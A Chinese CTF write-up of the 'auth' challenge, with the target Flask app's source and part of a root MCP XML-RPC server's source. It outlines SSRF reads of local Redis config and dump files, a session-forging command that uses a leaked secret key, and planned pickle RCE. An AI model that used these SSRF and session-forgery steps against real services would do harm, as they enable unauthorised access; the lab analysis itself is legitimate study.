2026-软件系统安全赛-华东赛区

爆零了😭8个小时盯一题,非常接近,死于pickle不熟练。

auth

靶机有flask(低权限),里面有redis(有密码)。python有反序列化洞,但是需要通过redis写入序列化数据。里面还有个MCP-Server(root)。思路略复杂,分为两步。

  1. 通过SSRF读取本地Redis的dump文件,获取flask的secret_key,伪造Session提前到admin(可以触发反序列化)

  2. SSRF操作Redis写入序列化数据,触发Pickle反序列化RCE,构造XML-RPC请求mcp,以root权限执行读取flag。

审计

app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
from flask import Flask, request, jsonify, render_template_string, session, redirect, url_for
import redis
import pickle
import requests
import base64
import os
import io
import datetime
import urllib.request
import urllib.error
import secrets
import json

app = Flask(__name__, static_folder='static', static_url_path='/static')

def render_page(title, content, username=None, role=None, show_nav=True):
"""生成带有样式的HTML页面

Args:
title: 页面标题
content: 主要内容HTML
username: 当前用户名(可选)
role: 用户角色(可选)
show_nav: 是否显示导航(默认True)
"""
# 导航菜单
nav_menu = ''
if show_nav:
if username:
nav_menu = f'''
<nav>
<ul>
<li><a href="/home">用户中心</a></li>
<li><a href="/profile">个人属性</a></li>
'''

if role == 'admin':
nav_menu += '''
<li><a href="/admin/online-users">在线用户</a></li>
<li><a href="/admin/users">注册用户</a></li>
'''

nav_menu += f'''
<li><a href="/logout">退出登录</a></li>
</ul>
</nav>
'''
else:
nav_menu = '''
<nav>
<ul>
<li><a href="/login">登录</a></li>
<li><a href="/register">注册</a></li>
</ul>
</nav>
'''

# 用户信息显示
user_info = ''
if username:
user_info = f'<div class="user-info">欢迎, {username}! (角色: {role})</div>'

html = f'''
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{title} - auth</title>
<link rel="stylesheet" href="/static/style.css">
<link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🔒</text></svg>">
</head>
<body>
<div class="container">
<header>
<h1>{title}</h1>
{user_info}
</header>

{nav_menu}

<main>
{content}
</main>

<footer>
<p>© 2026 auth | 简约安全设计</p>
</footer>
</div>

<script src="/static/script.js"></script>
</body>
</html>
'''
return html

class User:
def __init__(self, username, password=None):
self.username = username
self.password = password
self.role = "user"
self.created_at = "2026-01-20"

def __repr__(self):
return f"User(username={self.username!r}, role={self.role!r})"


class OnlineUser:
"""在线用户类,用于保存登录状态信息"""
def __init__(self, username, role="user"):
self.username = username
self.role = role
self.login_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# 设置失效时间为登录时间后1小时
expiry = datetime.datetime.now() + datetime.timedelta(hours=1)
self.expiry_time = expiry.strftime("%Y-%m-%d %H:%M:%S")
self.ip_address = request.remote_addr if request else "unknown"

def __repr__(self):
return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"


class RestrictedUnpickler(pickle.Unpickler):
"""限制性的Unpickler,只允许OnlineUser类和安全的内置函数"""

ALLOWED_CLASSES = {
'__main__.OnlineUser': OnlineUser,
'builtins': __builtins__
}

def find_class(self, module: str, name: str):
full_name = f"{module}.{name}"

# 允许builtins模块的基础类型和安全函数
if module == "builtins" and name in ["getattr", "setattr", "dict", "list", "tuple"]:
return getattr(__builtins__, name)

# 白名单检查
if full_name in self.ALLOWED_CLASSES:
return self.ALLOWED_CLASSES[full_name]

raise pickle.UnpicklingError(f"Class '{full_name}' is not allowed")


# Redis配置
CONFIG_FILE_PATH = '/opt/app_config/redis_config.json'

# 默认配置值
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_PASSWORD = '123456'

# 尝试从配置文件读取配置
try:
if os.path.exists(CONFIG_FILE_PATH):
print(f"从配置文件读取Redis配置: {CONFIG_FILE_PATH}")
with open(CONFIG_FILE_PATH, 'r') as config_file:
config = json.load(config_file)

# 从配置文件获取配置值,如果不存在则使用默认值
REDIS_HOST = config.get('redis_host', REDIS_HOST)
REDIS_PORT = config.get('redis_port', REDIS_PORT)
REDIS_PASSWORD = config.get('redis_password', REDIS_PASSWORD)

print(f"配置文件读取成功: host={REDIS_HOST}, port={REDIS_PORT}")

try:
os.remove(CONFIG_FILE_PATH)
print(f"配置文件已删除: {CONFIG_FILE_PATH}")
except Exception as delete_error:
print(f"警告:无法删除配置文件 {CONFIG_FILE_PATH}: {delete_error}")
else:
print(f"配置文件不存在: {CONFIG_FILE_PATH},使用默认Redis配置")
except Exception as config_error:
print(f"配置文件读取失败: {config_error},使用默认Redis配置")

# 连接Redis
try:
r = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, decode_responses=False)
r.ping()
print(f"Redis连接成功: {REDIS_HOST}:{REDIS_PORT}")

# 从Redis获取或生成随机secret_key
SECRET_KEY_REDIS_KEY = 'app:secret_key'
secret_key = r.get(SECRET_KEY_REDIS_KEY)
if secret_key is None:
# 生成新的随机密钥(64个字符的十六进制字符串)
secret_key = secrets.token_hex(32)
r.set(SECRET_KEY_REDIS_KEY, secret_key)
print(f"已生成新的随机secret_key并保存到Redis: {SECRET_KEY_REDIS_KEY}")
else:
# Redis返回的是bytes,需要解码为字符串
if isinstance(secret_key, bytes):
secret_key = secret_key.decode('utf-8')
print(f"从Redis加载现有的secret_key: {SECRET_KEY_REDIS_KEY}")

# 设置Flask应用的secret_key
app.secret_key = secret_key
print(f"Flask secret_key已设置(长度: {len(secret_key)})")

except Exception as e:
print(f"Redis连接失败: {e}")
r = None


@app.route('/')
def index():
return redirect(url_for('login'))


@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form.get('username', '')
password = request.form.get('password', '')

if not username or not password:
return '用户名和密码不能为空'

# 检查用户是否存在
if r is None:
return 'Redis连接失败,无法验证用户'

# 从Redis获取用户密码哈希
stored_password = r.hget(f'user:{username}', 'password')
if stored_password is None:
return '用户不存在或密码错误'

# 简单密码验证
if stored_password.decode('utf-8') != password:
return '用户不存在或密码错误'

# 登录成功,设置session
session['username'] = username
session['logged_in'] = True

# 获取用户角色
role_data = r.hget(f'user:{username}', 'role')
role = role_data.decode('utf-8') if role_data else 'user'
session['role'] = role

online_user = OnlineUser(username, role)
serialized_user = pickle.dumps(online_user)
r.set(f'online_user:{username}', serialized_user, ex=3600) # 设置1小时过期

return redirect(url_for('home'))

login_form = '''
<div class="form-container">
<h2>用户登录</h2>
<form method="post" class="login-form">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>
<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">登录</button>
</div>
</form>
<div class="text-center mt-20">
<p>还没有账号? <a href="/register" class="btn btn-secondary btn-small">注册新账户</a></p>
</div>
</div>
'''

return render_page('登录', login_form, show_nav=False)


# 用户注册
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form.get('username', '')
password = request.form.get('password', '')
confirm_password = request.form.get('confirm_password', '')
name = request.form.get('name', '')
age = request.form.get('age', '')
phone = request.form.get('phone', '')

if not username or not password:
return '用户名和密码不能为空'

if password != confirm_password:
return '两次输入的密码不一致'

if r is None:
return 'Redis连接失败,无法注册用户'

# 检查用户是否已存在
if r.hexists(f'user:{username}', 'password'):
return '用户名已存在'

user_data = {
'password': password,
'role': 'user',
'created_at': '2026-01-20',
'name': name if name else username, # 如果未提供姓名,默认使用用户名
'age': age if age else '0',
'phone': phone if phone else '未填写',
'avatar': '' # 默认头像为空
}

r.hset(f'user:{username}', mapping=user_data)

success_content = f'''
<div class="message message-success">
<h3>注册成功!</h3>
<p>用户 <strong>{username}</strong> 已成功注册。</p>
<p><a href="/login" class="btn btn-success mt-10">前往登录</a></p>
</div>
'''
return render_page('注册成功', success_content, show_nav=False)

register_form = '''
<div class="form-container">
<h2>用户注册</h2>
<form method="post" class="register-form">
<div class="form-group">
<label for="username">用户名 <span class="required">*</span></label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>

<div class="form-group">
<label for="password">密码 <span class="required">*</span></label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>

<div class="form-group">
<label for="confirm_password">确认密码 <span class="required">*</span></label>
<input type="password" id="confirm_password" name="confirm_password" required placeholder="请再次输入密码">
</div>

<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" placeholder="可选,默认为用户名">
</div>

<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" min="0" max="150" placeholder="可选">
</div>

<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" placeholder="可选">
</div>

<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">注册</button>
</div>
</form>

<div class="text-center mt-20">
<p>已有账号? <a href="/login" class="btn btn-secondary btn-small">返回登录</a></p>
</div>
</div>
'''

return render_page('注册', register_form, show_nav=False)


@app.route('/home')
def home():
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '访客')
role = session.get('role', 'user')

admin_link = ''
if role == 'admin':
admin_link = '<li><a href="/admin/online-users">管理在线用户</a> - 查看所有在线用户信息</li>\n <li><a href="/admin/users">管理注册用户</a> - 查看所有注册用户信息</li>'

main_content = f'''
<div class="dashboard">
<div class="welcome-message">
<h2>欢迎回来,{username}!</h2>
<p class="role-badge">角色: <span class="badge">{role}</span></p>
</div>

<div class="dashboard-cards">
<div class="card">
<h3>个人信息</h3>
<p>查看和编辑您的个人资料,包括头像上传</p>
<a href="/profile" class="btn btn-success mt-10">管理个人信息</a>
</div>
'''

if role == 'admin':
main_content += '''
<div class="card">
<h3>用户管理</h3>
<p>管理系统中的用户</p>
<div class="flex flex-column gap-10 mt-10">
<a href="/admin/online-users" class="btn btn-small">在线用户</a>
<a href="/admin/users" class="btn btn-small">注册用户</a>
</div>
</div>
'''

main_content += '''
</div>

<div class="quick-actions mt-30">
<h3>快速操作</h3>
<div class="flex gap-10">
<a href="/logout" class="btn btn-danger">退出登录</a>
</div>
</div>
</div>
'''

return render_page('用户中心', main_content, username, role)


@app.route('/admin/online-users')
def admin_online_users():
if not session.get('logged_in'):
return redirect(url_for('login'))

if session.get('role') != 'admin':
return '权限不足,需要管理员权限'

if r is None:
return 'Redis连接失败'

# 获取所有在线用户键
online_keys = r.keys('online_user:*')

if not online_keys:
return '没有在线用户'

users_html = '<h1>在线用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
users_html += '<tr><th>用户名</th><th>角色</th><th>登录时间</th><th>失效时间</th><th>IP地址</th><th>状态</th></tr>'

for key in online_keys:
try:
serialized = r.get(key)
if serialized:
file = io.BytesIO(serialized)
unpickler = RestrictedUnpickler(file)
online_user = unpickler.load()

expiry_time = datetime.datetime.strptime(online_user.expiry_time, "%Y-%m-%d %H:%M:%S")
current_time = datetime.datetime.now()
status = '在线' if current_time < expiry_time else '已过期'

users_html += f'''
<tr>
<td>{online_user.username}</td>
<td>{online_user.role}</td>
<td>{online_user.login_time}</td>
<td>{online_user.expiry_time}</td>
<td>{online_user.ip_address}</td>
<td style="color: {'green' if status == '在线' else 'red'}">{status}</td>
</tr>
'''
except Exception as e:
users_html += f'<tr><td colspan="6">反序列化错误: {e}</td></tr>'

users_html += '</table>'

# 获取当前用户信息用于render_page
current_username = session.get('username', '')
current_role = session.get('role', '')

users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/users" class="btn btn-secondary">查看注册用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''

return render_page('在线用户管理', users_html, current_username, current_role)


@app.route('/admin/users')
def admin_users():
if not session.get('logged_in'):
return redirect(url_for('login'))

if session.get('role') != 'admin':
return '权限不足,需要管理员权限'

if r is None:
return 'Redis连接失败'

# 获取所有用户键
user_keys = r.keys('user:*')

if not user_keys:
return '没有注册用户'

users_html = '<h1>注册用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
users_html += '<tr><th>用户名</th><th>角色</th><th>姓名</th><th>年龄</th><th>手机号码</th><th>创建时间</th></tr>'

for key in user_keys:
try:
user_data = r.hgetall(key)
if user_data:
user_info = {}
for field, value in user_data.items():
field_str = field.decode('utf-8') if isinstance(field, bytes) else field
value_str = value.decode('utf-8') if isinstance(value, bytes) else value
user_info[field_str] = value_str

username = key.decode('utf-8').replace('user:', '') if isinstance(key, bytes) else key.replace('user:', '')
role = user_info.get('role', 'user')
name = user_info.get('name', username)
age = user_info.get('age', '0')
phone = user_info.get('phone', '未填写')
created_at = user_info.get('created_at', '未知')

users_html += f'''
<tr>
<td>{username}</td>
<td>{role}</td>
<td>{name}</td>
<td>{age}</td>
<td>{phone}</td>
<td>{created_at}</td>
</tr>
'''
except Exception as e:
users_html += f'<tr><td colspan="6">获取用户信息错误: {e}</td></tr>'

users_html += '</table>'

current_username = session.get('username', '')
current_role = session.get('role', '')

users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/online-users" class="btn btn-secondary">查看在线用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''

return render_page('注册用户管理', users_html, current_username, current_role)


@app.route('/profile')
def profile():
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'

# 从Redis获取用户信息
user_data = r.hgetall(f'user:{username}')
if not user_data:
return '用户信息不存在'

user_info = {}
for key, value in user_data.items():
user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \
value.decode('utf-8') if isinstance(value, bytes) else value

name = user_info.get('name', username)
age = user_info.get('age', '0')
phone = user_info.get('phone', '未填写')
avatar = user_info.get('avatar', '')
role = user_info.get('role', 'user')
created_at = user_info.get('created_at', '未知')

# 判断头像类型:URL或本地文件
if avatar.startswith('http://') or avatar.startswith('https://'):
avatar_src = avatar
else:
avatar_src = ''

# 构建个人资料内容
profile_content = f'''
<div class="profile-container">
<div class="profile-header">
<h2>个人资料</h2>
<p>查看和管理您的个人信息</p>
</div>

<div class="profile-content">
<div class="profile-avatar-section">
<div class="avatar-preview">
<img src="{avatar_src}" alt="用户头像" id="profile-avatar">
</div>
<div class="avatar-actions">
<a href="/profile/avatar" class="btn btn-success">更换头像</a>
</div>
</div>

<div class="profile-info-section">
<h3>基本信息</h3>
<table class="profile-info-table">
<tr>
<th>用户名</th>
<td>{username}</td>
</tr>
<tr>
<th>姓名</th>
<td>{name}</td>
</tr>
<tr>
<th>年龄</th>
<td>{age}</td>
</tr>
<tr>
<th>手机号码</th>
<td>{phone}</td>
</tr>
<tr>
<th>角色</th>
<td><span class="badge">{role}</span></td>
</tr>
<tr>
<th>注册时间</th>
<td>{created_at}</td>
</tr>
</table>

<div class="profile-actions mt-30">
<a href="/profile/edit" class="btn btn-success">编辑个人资料</a>
<a href="/home" class="btn btn-secondary">返回用户中心</a>
</div>
</div>
</div>
</div>
'''

return render_page('个人属性', profile_content, username, role)


# 编辑个人属性
@app.route('/profile/edit', methods=['GET', 'POST'])
def edit_profile():
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'

if request.method == 'POST':
# 获取表单数据
name = request.form.get('name', '')
age = request.form.get('age', '')
phone = request.form.get('phone', '')

# 验证年龄是否为数字
if age and not age.isdigit():
return '年龄必须是数字'

# 获取当前用户信息
current_data = r.hgetall(f'user:{username}')
if not current_data:
return '用户信息不存在'

# 更新用户信息(保留密码和角色等字段)
updates = {}
if name:
updates['name'] = name
if age:
updates['age'] = age
if phone:
updates['phone'] = phone

# 只更新有变化的字段
if updates:
r.hset(f'user:{username}', mapping=updates)

return redirect(url_for('profile'))

# GET请求,显示编辑表单
# 获取当前用户信息
user_data = r.hgetall(f'user:{username}')
if not user_data:
return '用户信息不存在'

# 解码字节数据为字符串
user_info = {}
for key, value in user_data.items():
user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \
value.decode('utf-8') if isinstance(value, bytes) else value

# 获取当前值
current_name = user_info.get('name', username)
current_age = user_info.get('age', '0')
current_phone = user_info.get('phone', '未填写')

# 构建编辑表单
edit_form = f'''
<div class="form-container">
<h2>编辑个人资料</h2>
<p>更新您的个人信息</p>

<form method="post" class="edit-form">
<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" value="{current_name}" placeholder="请输入您的姓名">
</div>

<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" value="{current_age}" min="0" max="150" placeholder="请输入您的年龄">
</div>

<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" value="{current_phone}" placeholder="请输入您的手机号码">
</div>

<div class="form-group">
<button type="submit" class="btn btn-success">保存修改</button>
<a href="/profile" class="btn btn-secondary" style="margin-left: 15px;">取消</a>
</div>
</form>

<div class="additional-actions mt-30">
<h3>其他操作</h3>
<div class="flex gap-10">
<a href="/profile/avatar" class="btn btn-small">更换头像</a>
<a href="/profile" class="btn btn-small">返回个人资料</a>
<a href="/home" class="btn btn-small">返回用户中心</a>
</div>
</div>
</div>
'''

return render_page('编辑个人属性', edit_form, username, session.get('role', 'user'))


# 退出登录
@app.route('/logout')
def logout():
session.clear()
return redirect(url_for('login'))


# 用户头像上传
@app.route('/profile/avatar', methods=['GET', 'POST'])
def upload_avatar():
# 检查用户是否登录
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'

if request.method == 'GET':
# 显示上传表单
upload_form = f'''
<div class="upload-container">
<h2>上传头像</h2>
<div class="user-info mb-20">
<p><strong>当前用户:</strong> {username}</p>
</div>

<div class="upload-options">
<div class="upload-option">
<h3>方式一:上传图片文件</h3>
<div class="upload-form-card">
<form method="post" enctype="multipart/form-data" class="upload-form">
<div class="form-group">
<label for="avatar_file">选择图片文件</label>
<input type="file" id="avatar_file" name="avatar_file" accept="image/*" class="file-input">
<p class="help-text">支持 JPG, PNG, GIF 等图片格式</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="上传文件" class="btn btn-success">上传文件</button>
</div>
</form>
</div>
</div>

<div class="upload-option">
<h3>方式二:提供图片URL</h3>
<div class="upload-form-card">
<form method="post" class="upload-form">
<div class="form-group">
<label for="avatar_url">图片URL地址</label>
<input type="text" id="avatar_url" name="avatar_url" placeholder="请输入图片URL地址" class="url-input">
<p class="help-text">请输入有效的图片URL地址</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="从URL下载" class="btn btn-success">从URL下载</button>
</div>
</form>
</div>
</div>
</div>

<div class="upload-note mt-30">
<div class="message">
<p><strong>注意:</strong>上传的头像将显示在您的个人资料中。</p>
</div>
</div>

<div class="upload-actions mt-30">
<a href="/profile" class="btn btn-secondary">返回个人属性</a>
</div>
</div>
'''

return render_page('上传头像', upload_form, username, session.get('role', 'user'))

# POST请求处理
upload_type = request.form.get('upload_type')

if upload_type == '上传文件':
# 处理文件上传
if 'avatar_file' not in request.files:
return '请选择要上传的文件'

file = request.files['avatar_file']
if file.filename == '':
return '请选择有效的文件'

# 检查文件类型
if file.content_type and not file.content_type.startswith('image/'):
return '只能上传图片文件'

return '功能尚未开发'

elif upload_type == '从URL下载':
url = request.form.get('avatar_url', '')
if not url:
return '请提供图片URL'

try:
# 使用urllib处理URL请求
import urllib.parse

# 解析URL获取主机和端口信息
parsed = urllib.parse.urlparse(url)
host = parsed.hostname
port = parsed.port or (80 if parsed.scheme == 'http' else 443 if parsed.scheme == 'https' else None)

# 使用urllib.request.urlopen发送请求
req = urllib.request.Request(url)

# 发送请求并获取响应
response = urllib.request.urlopen(req, timeout=10)
response_data = response.read()
content_type = response.headers.get('Content-Type', '')
status_code = response.getcode()

r.hset(f'user:{username}', 'avatar', url)
data_size = len(response_data)

base64_data = base64.b64encode(response_data).decode('utf-8')

# 创建base64图片数据URI
# 如果content_type为空或无效,使用默认的image/png
display_content_type = content_type if content_type else 'image/png'
data_uri = f'data:{display_content_type};base64,{base64_data}'

# 统一显示结果,使用img标签展示base64编码的图片数据
unified_content = f'''
<div class="message">
<h2>图片预览</h2>

<div class="image-preview-container mt-20">
<div class="image-wrapper">
<img src="{data_uri}" alt="加载图片图片" style="max-width: 100%; max-height: 500px; border: 1px solid #ddd; border-radius: 4px;">
</div>
</div>

<div class="preview-actions mt-30">
<a href="/profile" class="btn btn-success">查看个人属性</a>
<a href="/profile/avatar" class="btn btn-secondary">继续上传</a>
</div>
</div>
'''

return render_page('图片预览', unified_content, username, session.get('role', 'user'))

except Exception as e:
error_content = f'''
<div class="message message-error">
<h2>处理失败</h2>
<div class="error-details">
<p><strong>错误信息:</strong> {e}</p>
</div>
<div class="error-actions mt-20">
<a href="/profile/avatar" class="btn btn-secondary">返回上传页面</a>
</div>
</div>
'''

return render_page('处理失败', error_content, username, session.get('role', 'user'))

else:
return '无效的上传类型'



if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=False)

读取file:///etc/redis/redis.conf获取真实的Redis密码redispass123(没错,源码写死的那个是假的。。)

多注册、登录、登出,触发Redis dump(大概要满足redis操作大于一定值且没10分钟左右检测一次)。读取file:///var/lib/redis/dump.rdb可以获取明文的flask secret_key,伪造session拿到admin权限。

1
2
3
# app:secret_key@@e862df6072f59a75ee66fff76e2be0af4166ac929a805e39993061d6d18223e3

python flask_session_cookie_manager3.py encode -s '88ff640dd01faab118a11f5610a15f64285e2ca45adda81c46a1dbdedf4b2a4b' -t "{'logged_in':True,'role':'admin','username':'admin'}"

遍历file:///proc/[pid]/cmdline找到MCP服务器源码(文件名随机):
mcp_server_secure_[hash].py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
#!/usr/bin/env python3
import sys
import os
import subprocess
import json
import platform
import threading
import time
import functools
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from xmlrpc.server import SimpleXMLRPCDispatcher
import logging

# 设置日志
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger('MCP-Secure-Server')

class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)

class SecureXMLRPCServer(SimpleXMLRPCServer):

def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._introspection_enabled = False

def system_listMethods(self):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

def system_methodSignature(self, method_name):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

def system_methodHelp(self, method_name):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

def _dispatch(self, method, params):
if method.startswith('system.'):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")

try:
return super()._dispatch(method, params)
except Fault as e:
raise Fault(403, "Authentication failed")
except Exception:
raise

class MCPServerSecure:

def __init__(self, host='0.0.0.0', port=54321):
self.host = host
self.port = port
self.server = SecureXMLRPCServer((host, port),
requestHandler=RequestHandler,
allow_none=True,
logRequests=False)

self.auth_token = "mcp_secure_token_b2rglxd"

self.register_methods()

logger.info(f"安全MCP服务器初始化完成,监听 {host}:{port}")
logger.info(f"认证令牌: {self.auth_token}")
logger.info(f"服务启动完成,进程ID: {os.getpid()}")

def verify_token(self, token):
"""验证令牌"""
return token == self.auth_token

def _auth_required(self, func):
"""认证装饰器"""
@functools.wraps(func)
def wrapper(token, *args, **kwargs):
if not self.verify_token(token):
return {'error': 'Authentication failed. Invalid token.'}
return func(*args, **kwargs)
return wrapper

def register_methods(self):
"""注册所有需要认证的RPC方法"""
# 所有方法都要求token作为第一个参数
self.server.register_function(
self._auth_required(self.get_server_info),
'get_server_info'
)
self.server.register_function(
self._auth_required(self.get_system_status),
'get_system_status'
)
self.server.register_function(
self._auth_required(self.list_files),
'list_files'
)
self.server.register_function(
self._auth_required(self.read_file),
'read_file'
)
self.server.register_function(
self._auth_required(self.execute_command),
'execute_command'
)
self.server.register_function(
self._auth_required(self.get_process_list),
'get_process_list'
)
self.server.register_function(
self._auth_required(self.service_control),
'service_control'
)

# ========== MCP 服务方法 ==========
def get_server_info(self):
"""获取MCP服务器信息"""
return {
'service': 'Secure Management Control Protocol Server',
'version': '2.0.0',
'host': self.host,
'port': self.port,
'elevated_privileges': os.geteuid() == 0,
'pid': os.getpid(),
'secure': True,
'auth_required': 'ALL_METHODS'
}

def get_system_status(self):
"""获取系统状态信息"""
try:
# CPU使用率
with open('/proc/loadavg', 'r') as f:
loadavg = f.read().strip()

# 内存信息
mem_info = {}
with open('/proc/meminfo', 'r') as f:
for line in f:
if 'MemTotal' in line or 'MemFree' in line or 'MemAvailable' in line:
key, value = line.split(':')
mem_info[key.strip()] = value.strip()

# 磁盘空间
disk_info = {}
try:
df_output = subprocess.check_output(['df', '-h', '/'],
stderr=subprocess.DEVNULL,
text=True)
lines = df_output.strip().split('\n')
